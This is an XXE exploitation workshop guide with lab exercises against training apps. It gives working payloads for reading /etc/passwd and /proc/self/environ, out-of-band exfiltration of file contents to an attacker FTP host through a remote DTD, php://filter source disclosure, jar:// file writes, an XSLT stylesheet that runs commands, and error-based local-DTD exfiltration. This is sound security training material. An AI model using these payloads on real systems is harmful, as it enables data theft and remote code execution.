Welcome to this 3-hour workshop on XML External Entities (XXE) exploitation!
This workshop presents the latest XML eXternal Entities (XXE) and XML-related attack vectors. XXE is a vulnerability that affects any XML parser that evaluates external entities. It gained visibility with its introduction in the OWASP Top 10 2017 (A4). You might be able to detect the classic patterns, but can you convert the vulnerability into directory listing, binary file exfiltration, file write or remote code execution?
The workshop focuses on techniques and exploitation tricks for both PHP and Java applications. Four applications will be at your disposal to test your skills. For every exercise, sample payloads are provided to save attendees some time.
The first requirement is to have an HTTP interception proxy installed.
For the infrastructure, you will need:
To do the exercises, you will need to run the lab applications yourself. All applications were built with a Docker container recipe, which should make deployment easier.
$ git clone https://github.com/GoSecure/xxe-workshop
%application_dir%/README.md) This step will differ for each application.
$ docker-compose up
XML documents are used in plenty of file formats. You have probably already edited a configuration file written in XML. If you have built a website, you have inevitably seen or edited HTML. You can also think about MS Office documents (.docx), Scalable Vector Graphics (.svg) and SOAP requests. Being widely implemented in most programming languages, XML is an excellent choice for interoperability. The XML standard describes many useful formatting features, but we are going to focus on "entities" because of the potential vulnerability they introduce.
XML entities are references to XML data inside XML documents. We say XML data because an entity can hold a literal string, XML tags or any XML syntax that is legal where it is inserted.
Entities in HTML are used for special characters
An entity can also be used for a repeated pattern
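As a minimal sketch of both uses, the Python snippet below parses a document that references a predefined character entity (`&amp;`) and declares one internal entity that is referenced twice. The entity name `team` and its value are made up for illustration.

```python
import xml.etree.ElementTree as ET

# Hypothetical document: `team` is an illustrative entity name.
DOCUMENT = """<!DOCTYPE note [
  <!ENTITY team "Blue Team">
]>
<note>&team; &amp; friends thank the &team;</note>"""

root = ET.fromstring(DOCUMENT)

# The parser substitutes every reference before the application sees the text.
expanded_text = root.text
print(expanded_text)
```

The application code never sees `&team;`. It only receives the expanded text, which is why entity handling is easy to overlook.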
When the keyword SYSTEM is added to an entity, the parser will attempt to load content from the specified URL. The value between quotes is the URL. For XML parsing done in a small script executed locally, this seems like a nice feature. However, when the parsing is done server side, the URLs from SYSTEM entities are also resolved on the server. A malicious user could point to a file stored on that server. If the server returns the parsing result, it will reveal the content of this file.
<!DOCTYPE data [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <data>&xxe;</data>
If the application returns the value inside the data node, the content of the file
/etc/passwd will be revealed.
passwd is a file that is universally present on Linux operating systems.
Hostnames, DNS resolvers and network device information can provide valuable leads for discovering additional assets.
file:///proc/self/net/dev: Lists the network interfaces (public and internal) with their traffic counters
The /proc virtual filesystem includes various files describing the current process.
file:///proc/self/cwd/FILE: Relative paths are likely to work.
file:///proc/self/cwd/ is an alternative to
file:///proc/self/cmdline: This virtual file returns the command and the arguments used to start the process.
file:///proc/self/environ: Environment variables defined in the context of the current process.
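On Linux, the fields of cmdline and environ are separated by NUL bytes. NUL is not a legal XML character, so a plain entity may fail on these files and an encoding trick may be needed to retrieve them. Once the raw bytes are obtained, a small helper makes them readable. The sketch below is an illustration only, and the sample values are invented.

```python
def split_proc_fields(raw: bytes) -> list[str]:
    """Split the NUL-separated content of /proc/<pid>/cmdline or environ."""
    return [field.decode("utf-8", "replace") for field in raw.split(b"\x00") if field]


def parse_environ(raw: bytes) -> dict[str, str]:
    """Turn the content of /proc/<pid>/environ into a dictionary."""
    env = {}
    for field in split_proc_fields(raw):
        key, _, value = field.partition("=")
        env[key] = value
    return env


# Invented sample data, shaped like the real files.
sample_cmdline = b"java\x00-jar\x00/opt/app/app.jar\x00"
sample_environ = b"HOME=/root\x00DB_PASSWORD=example\x00"

print(split_proc_fields(sample_cmdline))
print(parse_environ(sample_environ))
```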
A few files contain the system version. They also contain no special characters, which makes them useful for testing.
For testing purposes, it might be interesting to read a virtual file with infinite content. The objective of the attacker would be either time-based detection or some form of Denial of Service (DoS).
For this first exercise, we are using a website that renders Atom feeds. The service is at the URL: http://xxe-workshop.gosec.co:8021
Start by submitting the form with the news feed (Atom feed) from the netsec subreddit.
For the workshop, you can use your shell to serve HTTP requests. As you can see below, you can start a simple web server with the command: python -m http.server 8123.
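If you prefer to start the same kind of server from a script, the standard library exposes it directly. This is a minimal sketch: the function name `make_file_server` is ours, and the default port simply mirrors the command above.

```python
import functools
import http.server


def make_file_server(directory=".", port=8123, host="0.0.0.0"):
    """Return an HTTP server that serves the files found in `directory`."""
    handler = functools.partial(
        http.server.SimpleHTTPRequestHandler, directory=directory
    )
    return http.server.ThreadingHTTPServer((host, port), handler)
```

Calling `make_file_server().serve_forever()` serves the current directory on port 8123 until interrupted. The request log printed on the console is useful later to confirm that the target fetched your files.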
It is always best to start with a simple working XML file rather than submitting a complex and specific payload first. Sometimes a failure to load our XML is caused by a simple syntax issue. XML can be unforgiving regarding the order of declarations, mistyped elements and unsupported characters.
Once the file is saved, you can submit a URL to this file. The URL must be public.
The result page should look like the following. It is a confirmation that our base file is valid. An XML file with a format other than Atom will trigger an error.
Next, we will attempt to fetch a file on the file system with an XML entity. The Atom feed should look as follows.
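A minimal sketch of such a pair of feeds, generated in Python. It assumes the application displays entry titles. The feed title, the identifiers and the dates are placeholders, and the helper `build_feed` is hypothetical.

```python
import xml.etree.ElementTree as ET

ATOM_NS = "http://www.w3.org/2005/Atom"


def build_feed(entry_title, doctype=""):
    """Return a minimal Atom feed; `doctype` is inserted before the root element."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f"{doctype}"
        f'<feed xmlns="{ATOM_NS}">\n'
        "  <title>Workshop test feed</title>\n"
        "  <id>urn:uuid:00000000-0000-0000-0000-000000000001</id>\n"
        "  <updated>2019-01-01T00:00:00Z</updated>\n"
        "  <entry>\n"
        f"    <title>{entry_title}</title>\n"
        "    <id>urn:uuid:00000000-0000-0000-0000-000000000002</id>\n"
        "    <updated>2019-01-01T00:00:00Z</updated>\n"
        "  </entry>\n"
        "</feed>\n"
    )


# Step 1: a harmless feed, to confirm the application accepts our file.
base_feed = build_feed("Hello")
ET.fromstring(base_feed.encode("utf-8"))  # raises ParseError if malformed

# Step 2: the same feed with an external entity placed in the entry title.
xxe_feed = build_feed(
    "&xxe;",
    '<!DOCTYPE feed [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>\n',
)
print(xxe_feed)
```

Keeping the two feeds identical apart from the DOCTYPE and the entity reference makes it easier to tell a syntax problem from a parser that refuses external entities.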
As a result, we can see the content of the file
/etc/passwd in the response.
In the page source, the content of the file is easier to read because the new lines are preserved.
Remote XML parsing will not always return content directly. If you are uploading a document such as a data file (.xml) or an MS Office document (.docx), you might not receive the content parsed from those documents.
We need to find a way to exfiltrate data during the parsing. Unfortunately, it is not possible to refer to an entity from another entity in the same DOCTYPE. This limitation comes from the way XML parsers interpret the document.
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE data [ <!ENTITY file SYSTEM "file:///etc/passwd"> <!ENTITY notworking SYSTEM "http://xxe.me/&file;"> ]> <data></data>
This payload will not work
A workaround for this limitation was discovered by researchers Alexey Osipov and Timur Yunusov. It allows the construction of a URL with data coming from other entities. The first version of this payload uses the Gopher protocol.
The technique was later updated with a variant that replaces Gopher with the FTP protocol. This is very useful because Gopher is deprecated and only available on old versions of Java.
The following payload requires a remote DTD file hosted on a web server. The DTD file takes care of the concatenation. The final objective is to evaluate ftp://test:%file;@my.ftp.server/. The file content is sent as the password.
<?xml version="1.0"?> <!DOCTYPE data [ <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % dtd SYSTEM "http://your.host/remote.dtd"> %dtd;]> <data>&send;</data>
<?xml version="1.0" encoding="UTF-8"?> <!ENTITY % all "<!ENTITY send SYSTEM 'ftp://test:%file;@my.ftp.server/'>"> %all;
In order to capture the file content, you need to record the password sent to your FTP server. For this purpose, Ivan Novikov created a mock FTP server that responds just enough to record a password. (FTP clients will not authenticate if the handshake is incomplete.)
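To illustrate the idea, here is a minimal Python sketch of such a mock server. It is not the script referenced above: the reply texts, the default port 2121 and the names `MockFTPHandler` and `start_mock_ftp` are our own choices. It greets the client, asks for a password after USER, and acknowledges and records everything else.

```python
import socketserver
import threading

captured = []  # every line received from clients, in arrival order


class MockFTPHandler(socketserver.StreamRequestHandler):
    def handle(self):
        # Greeting expected by FTP clients before they send USER.
        self.wfile.write(b"220 mock FTP ready\r\n")
        for raw in self.rfile:
            line = raw.decode("latin-1").rstrip("\r\n")
            captured.append(line)
            print("<", line)
            verb = line.split(" ", 1)[0].upper()
            if verb == "USER":
                self.wfile.write(b"331 password required\r\n")
            elif verb == "QUIT":
                self.wfile.write(b"221 bye\r\n")
                break
            else:
                # PASS and anything else: acknowledge so the client keeps talking.
                self.wfile.write(b"230 ok\r\n")


def start_mock_ftp(host="0.0.0.0", port=2121):
    """Start the mock server in a background thread and return it."""
    server = socketserver.ThreadingTCPServer((host, port), MockFTPHandler)
    server.daemon_threads = True
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server
```

Every line is logged rather than only the PASS command because file content containing new lines may arrive spread over several lines.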
For this second exercise, we are using a website that renders an SVG image based on the XML given. The service is at the URL: http://xxe-workshop.gosec.co:8022
When reusing the technique we saw in the previous exercise, we can see that the file content is displayed on a single line. This makes it hard to exfiltrate text files. In many real-world cases, the result will simply not be displayed to the user. The parsing will be hidden and possibly done asynchronously.
Now, we are going to attempt to exfiltrate the file with the out-of-band DTD technique. The XML payload will look as follows:
The DTD referenced in the XML payload is a file hosted on a server that we control. The DTD serves the purpose of concatenating the file content to the FTP URL.
Instead of using a real FTP server, we will use a dummy one that responds to a few FTP commands and displays all content received, including the password. We expect to receive the file content in the password.
shell-workshop.gosec.co is the host from which you are running the mock FTP server. If you are running everything locally, you can use
As you can see, the mock FTP service covers only three FTP commands. You can get the Ruby script from the workshop repository.
The payload should look like this.
An easier way is to use the encoding tags from the HackVertor plugin. It is a good encoding tool for quickly testing payloads without manually re-encoding them on every request.
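If you script your requests instead, the same encoding step can be done with the Python standard library. This sketch assumes the payload travels in a URL-encoded form field. The host your.host is the placeholder already used in the payload above.

```python
from urllib.parse import quote, unquote

payload = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE data [<!ENTITY % dtd SYSTEM "http://your.host/remote.dtd"> %dtd;]>'
    "<data>&send;</data>"
)

# safe="" also encodes "/", so nothing in the payload is left to interpretation.
encoded = quote(payload, safe="")
print(encoded)

# Decoding must give back the exact payload.
decoded = unquote(encoded)
```

The characters that matter most here are `%` and `&`: left unencoded, they would be interpreted as URL escapes or parameter separators before the XML ever reaches the parser.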
Every step of the XML parsing can fail because of a small error. If you get a result that differs from the screenshot, investigate the potential causes.
First, the DTD is fetched. This confirms that our XML payload is well-formed. If the DTD is not fetched, verify the URL you specified in the XML entity.
Second, the FTP server is contacted, which confirms that the concatenation succeeded.
You can continue exploring the file system by modifying your XML payload and seeing the result on your shell in the dummy FTP server output.
We already mentioned the php:// protocol. This protocol, available only on PHP of course, provides a few options to encode or decode file content.
XXE has major limitations regarding which files can be read. In general, you can't read non-ASCII characters or special characters that are not XML compatible. You might have noticed this when doing the first two exercises.
In order to read files with special characters, we can take advantage of the php:// protocol.
Reference: php:// - php.net documentation
This new capability opens the door to reading most configuration files, database files and more.
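As a small sketch, the Python helpers below build a php://filter URI that applies the base64 encoding filter and decode what the server returns. The function names and the target path are illustrative.

```python
import base64


def php_base64_uri(path: str) -> str:
    """URI asking PHP to base64-encode `path` before handing it to the XML parser."""
    return f"php://filter/convert.base64-encode/resource={path}"


def decode_response(blob: str) -> bytes:
    """Decode the Base64 text copied from the HTTP response."""
    return base64.b64decode(blob)


uri = php_base64_uri("/etc/passwd")
entity = f'<!ENTITY xxe SYSTEM "{uri}">'
print(entity)

# Simulated server output, to show the decoding step only.
simulated = base64.b64encode(b"<?php $secret = 1; ?>\x00\xff").decode("ascii")
print(decode_response(simulated))
```

Because the Base64 alphabet contains only XML-safe characters, binary files and files containing `<` or `&` survive the trip through the parser.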
Here is an exhaustive list of protocols that could be useful when exploiting XXE.
Access files with a relative or absolute path.
Nothing surprising here. You can trigger GET requests to an HTTP service. While it can be a starting point for Server Side Request Forgery (SSRF), the response is not likely to be readable. Most web pages are not valid XML.
https://169.254.169.254/latest/user-data: AWS metadata URLs now require a special header. It is unlikely that you will be able to access them with XXE.
This protocol allows you to connect to an FTP server to read files (this requires knowing the exact file location and the credentials to authenticate) or to exfiltrate data (see the next exercise).
Another option for data exfiltration is the gopher protocol. It allows connecting to any TCP service and sending an arbitrary message. The path section of the URL is the data that will be written to the TCP socket. It is rarely available, as it requires very old versions of Java.
The jar protocol is a very special case. It is only available in Java applications. It allows access to files inside a PKZIP archive (.jar, ...). You will see in the last exercise how it can be used to write files to a remote server.
This protocol is an alternative to the file:// protocol. It is of limited use. It is often cited as a method to bypass WAF rules that block specific strings such as
For this third exercise, we are using a website that is very similar to the one in the first exercise. It also parses Atom feeds. It is, however, written in a different language: PHP. The service is at the URL: http://xxe-workshop.gosec.co:8022
As in the first exercise, we are going to host a malicious Atom feed on a web server. This XML document will use the PHP base64 encoding filter inside an XML entity.
We are targeting the file /.svn/wc.db, a metadata file containing SVN history information. Hopefully, we can obtain additional information on the codebase.
The response will be in Base64 because this is what we instructed the server to do with the filter. To read the original content, we can decode it with a variety of decoding tools. In Burp, you can press Ctrl-B to decode your selection.
With the .svn/wc.db file extracted, we can see that filenames are exposed, including some pages we did not know existed!
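The extracted wc.db is an SQLite database, so the filenames can also be listed with a few lines of Python. The sketch below assumes the layout used by recent Subversion working copies, where a NODES table holds a local_relpath column. Check the schema of your own copy if the query fails.

```python
import base64
import os
import sqlite3
import tempfile


def list_svn_paths(b64_blob: str) -> list[str]:
    """Decode a Base64 wc.db dump and return the tracked relative paths."""
    raw = base64.b64decode(b64_blob)
    with tempfile.NamedTemporaryFile(suffix=".db", delete=False) as tmp:
        tmp.write(raw)
        db_path = tmp.name
    try:
        conn = sqlite3.connect(db_path)
        try:
            # Assumed schema: table NODES with a local_relpath column.
            rows = conn.execute(
                "SELECT DISTINCT local_relpath FROM nodes ORDER BY local_relpath"
            ).fetchall()
        finally:
            conn.close()
    finally:
        os.unlink(db_path)
    # The working copy root is stored as an empty path; skip it.
    return [row[0] for row in rows if row[0]]
```

Pass it the Base64 text returned by the application, for example `list_svn_paths(response_body)`, where `response_body` is a hypothetical variable holding the blob.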
The SVN metadata file revealed that a PHP script was present at
We can use the same filter technique to view the source code of this page. Here is the payload.
When the response is received, we can decode the Base64 blob to view the PHP source.
The jar protocol is only available in Java applications. It allows access to files inside a PKZIP file (
It works for local files:
And for remote files:
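The general shape of a jar URL is jar:, then the URL of the archive, then !/ and the path of the entry inside the archive. The Python sketch below builds a small archive and both kinds of URL. The archive location, the host and the entry name are hypothetical.

```python
import io
import zipfile


def build_zip(entries: dict[str, bytes]) -> bytes:
    """Return the bytes of a ZIP archive containing the given entries."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as archive:
        for name, data in entries.items():
            archive.writestr(name, data)
    return buffer.getvalue()


def jar_url(archive_url: str, entry: str) -> str:
    """Build jar:<archive URL>!/<entry path inside the archive>."""
    return f"jar:{archive_url}!/{entry.lstrip('/')}"


archive_bytes = build_zip({"file.txt": b"hello from the archive\n"})

local_url = jar_url("file:///tmp/archive.zip", "file.txt")
remote_url = jar_url("http://your.host/archive.zip", "file.txt")
print(local_url)
print(remote_url)
```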
What is happening behind the scenes with the HTTP URL with a remote ZIP? There are in fact multiple steps that lead to the file being extracted.
What if we manage to stop the sequence at the second step? It is possible to do so! The trick is to never close the connection when serving the file in step 2. The client (in this case the web application) will download as much as it can and write the content as it arrives. To accomplish this, we need a modified or custom web server that hangs on purpose. You can find two utilities that serve this purpose in the GitHub repository (one in Python,
slow_http_server.py, and one in
Once the server has downloaded your file, you need to find its location by browsing the temp directory. Because the name is random, the file path can't be predicted in advance.
Writing files to a temporary directory can help escalate another vulnerability that involves a path traversal (such as local file include, template injection, XSLT RCE, deserialization, etc.).
Extensible Stylesheet Language Transformations (XSLT) is a language that describes transformations applied to XML documents. The official specification provides basic transformations. Languages such as Java and .NET have introduced extensions that allow methods to be invoked from the stylesheet. The Java implementation is more prone to vulnerability because this extension is enabled by default. It can access every class in the classpath.
If you see a feature that allows you to configure an XSLT file in a Java application, remote code execution might be possible.
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:date="http://xml.apache.org/xalan/java/java.util.Date" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:str="http://xml.apache.org/xalan/java/java.lang.String" exclude-result-prefixes="date"> <xsl:output method="text"/> <xsl:template match="/"> <xsl:variable name="cmd"><![CDATA[touch /tmp/test1234]]></xsl:variable> <xsl:variable name="rtObj" select="rt:getRuntime()"/> <xsl:variable name="process" select="rt:exec($rtObj, $cmd)"/> <xsl:text>Process: </xsl:text><xsl:value-of select="$process"/> </xsl:template> </xsl:stylesheet>
In the root node, classes (
java/java.lang.String) are imported for future reference. To customize the previous payload, you need to edit the assignment
The touch command can be replaced with any command available on the server.
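When testing several commands, generating the stylesheet from a template avoids editing mistakes. The Python sketch below reuses the structure of the payload above, keeping only the Runtime namespace it actually calls. The helper name `build_stylesheet` and the `@@CMD@@` placeholder are our own.

```python
import xml.etree.ElementTree as ET

XSL_NS = "http://www.w3.org/1999/XSL/Transform"

TEMPLATE = """<xsl:stylesheet version="1.0"
  xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
  xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime">
  <xsl:output method="text"/>
  <xsl:template match="/">
    <xsl:variable name="cmd"><![CDATA[@@CMD@@]]></xsl:variable>
    <xsl:variable name="rtObj" select="rt:getRuntime()"/>
    <xsl:variable name="process" select="rt:exec($rtObj, $cmd)"/>
    <xsl:text>Process: </xsl:text><xsl:value-of select="$process"/>
  </xsl:template>
</xsl:stylesheet>"""


def build_stylesheet(command: str) -> str:
    """Return the stylesheet with `command` placed in the cmd variable."""
    if "]]>" in command:
        raise ValueError("the command must not contain the CDATA terminator ]]>")
    stylesheet = TEMPLATE.replace("@@CMD@@", command)
    ET.fromstring(stylesheet)  # fail early if the result is not well-formed
    return stylesheet


print(build_stylesheet("touch /tmp/test1234"))
```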
To exploit this service, we will need to evaluate multiple URLs with the same XXE base payload. To send those similar requests, we can encapsulate the logic inside a script.
Here is a demonstration of the Burp plugin Reissue Request Scripter. The request exported is the POST request to
For this exercise, an exploit script is provided to you. The only segment to edit is the session cookie.
You can test that the script is working properly by evaluating a test file. The script has only one argument, the file to evaluate (python exploit.py [FILE]). In the capture below, we are executing python exploit.py /etc/issue.
In order to persist a file for more than a second, we must serve it with a web server that holds the connection open as long as possible. A simple Tornado server is provided in the workshop repository. You can see in the script that the sleep function is called to prevent the connection from closing when the function returns. As soon as the connection closes, the Java application attempts to extract the ZIP and disposes of the file, leaving us no time to use the file written to disk.
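The same behaviour can be sketched with the Python standard library alone. This is not the Tornado script from the repository. The names `make_slow_handler` and `start_slow_server`, the default port 8124 and the one-hour default delay are assumptions chosen for illustration.

```python
import http.server
import threading
import time


def make_slow_handler(payload: bytes, hold_seconds: float):
    class SlowHandler(http.server.BaseHTTPRequestHandler):
        def do_GET(self):
            self.send_response(200)
            self.send_header("Content-Type", "application/zip")
            # No Content-Length: the client keeps reading until we close.
            self.end_headers()
            self.wfile.write(payload)
            self.wfile.flush()
            # Keep the socket open so the client does not finish the download.
            time.sleep(hold_seconds)

        def log_message(self, fmt, *args):
            print("request:", fmt % args)

    return SlowHandler


def start_slow_server(payload, hold_seconds=3600, host="0.0.0.0", port=8124):
    """Serve `payload` on every GET and hold each connection open."""
    handler = make_slow_handler(payload, hold_seconds)
    server = http.server.ThreadingHTTPServer((host, port), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server
```

The payload is flushed before sleeping so that the client has the complete content on disk while the connection is still considered in progress.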
The file that will be served is a malicious stylesheet. For more information, refer to the previous section.
In the following stylesheet, we are invoking the methods
Step 1: Starting the "slow" HTTP server
Step 2: Uploading our file
Step 3: Browsing to find the full path of the file
Step 4: Exploit path traversal
Step 5: Interact with shell
If the parsed XML is not returned and the network out-of-band channel is not available (aggressive network filtering), is the XML parser still exploitable? For a few years, this case was considered unexploitable.
One of the remaining channels is error messages. This channel is available if the application is configured to return detailed error messages.
Can we do a concatenation trick without an external DTD? The short answer is: yes, we can! Arseniy Sharoglazov found an interesting technique that allows us to use a local DTD instead of an external DTD.
We need to find an entity that is declared and used in the same DTD. Here is an example taken from
[...] <!ENTITY % constant '>[MALICIOUS]<!ELEMENT dummy(123 '> <!ELEMENT patelt (%constant;)*> [...]
If we replace the constant entity with the following XML injection, we can evaluate arbitrary XML. Our objective is to do a concatenation within this injection point.
<!ENTITY % constant '>[MALICIOUS]<!ELEMENT dummy(123 '> <!ELEMENT patelt (%constant;)*>
The malicious XML we are looking to inject in the [MALICIOUS] placeholder is the following:
<!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>">
When %eval is evaluated, the concatenation occurs.
In summary, here are the steps that will be needed during the XML parsing:
The final evaluation should trigger the injection of new entities doing the same concatenation trick used in external DTD.
The payload we are going to send will look like this:
<!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd"> <!ENTITY % constant '><!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>"><!ELEMENT dummy(123 '> <!ELEMENT patelt (%constant;)*> %local_dtd; ]> <message></message>
To see it in action, move on to the next section.
If you want to know more about the different injection patterns, visit this blog post: Automating local DTD discovery for XXE exploitation.
First, we need to build a base payload that simply triggers a FileNotFoundException. We need to confirm that error messages are returned to the client.
In order to find if at least one interesting DTD is present on the remote server, we are going to need to brute force it with a huge list of potential paths.
The content that will change in our request is the path. The XML around this path will not change and it needs to be URL encoded.
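If you would rather generate the requests from a script than from Intruder, the sketch below shows the idea: a fixed XML wrapper, one candidate path per request, and URL encoding applied to the whole document. The wrapper is a simple probe that only loads the DTD. The candidate list is illustrative, and its second entry is deliberately invalid.

```python
from urllib.parse import quote

# Fixed wrapper: only the path changes between requests.
PROBE = (
    '<!DOCTYPE message [<!ENTITY % local_dtd SYSTEM "file://{path}"> '
    "%local_dtd;]><message></message>"
)

# Illustrative candidates; a real list contains many more paths.
CANDIDATE_PATHS = [
    "/usr/share/xml/fontconfig/fonts.dtd",
    "/nonexistent/example.dtd",
]


def build_probes(paths):
    """Map each candidate path to its URL-encoded probe document."""
    return {path: quote(PROBE.format(path=path), safe="") for path in paths}


probes = build_probes(CANDIDATE_PATHS)
for path, body in probes.items():
    print(path, "->", body[:60] + "...")
```

Keeping the mapping from path to encoded body avoids having to decode the request afterwards to find out which path produced a given response.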
Once Intruder is done with the brute force attack, we can filter the results with a negative search.
Intruder is not showing the initial value from our list, but the final value encoded. For this reason, we need to decode the path from the request.
Once a DTD with a known overridable entity is found, we can start to poke at files to exfiltrate.
You can reuse an XXE payload from this list. Only the file entity needs to be changed. The path to the DTD (local_dtd) and the dummy path (/nonexistent) remain unmodified.
You can view the complete attack in this video.
A misconfigured XML parser can open doors to attackers. Being able to read files on the vulnerable server is the main concern. But as you saw in this workshop, being able to read key files can lead to remote command execution.
From a developer's perspective, you can prevent such issues by properly configuring the XML parser used in your application. A few libraries have a secure configuration by default, but it is best to verify with a reference such as the OWASP Cheat Sheet in the reference below.
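As an illustration of the defensive side, the Python sketch below refuses any document that carries a DOCTYPE before handing it to the regular parser. This is one possible hardening approach among several, shown in Python only for brevity. The names `DoctypeForbidden` and `parse_untrusted` are our own, and the settings for PHP and Java parsers differ.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when an untrusted document declares a DOCTYPE."""


def parse_untrusted(xml_bytes: bytes):
    """Parse XML only if it contains no DOCTYPE (hence no entity declarations)."""
    checker = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DoctypeForbidden(f"DOCTYPE '{name}' is not allowed")

    checker.StartDoctypeDeclHandler = on_doctype
    checker.Parse(xml_bytes, True)  # raises as soon as a DOCTYPE starts
    return ET.fromstring(xml_bytes)
```

Rejecting the DOCTYPE outright is stricter than disabling external entities only, which suits applications that never need DTDs in the first place.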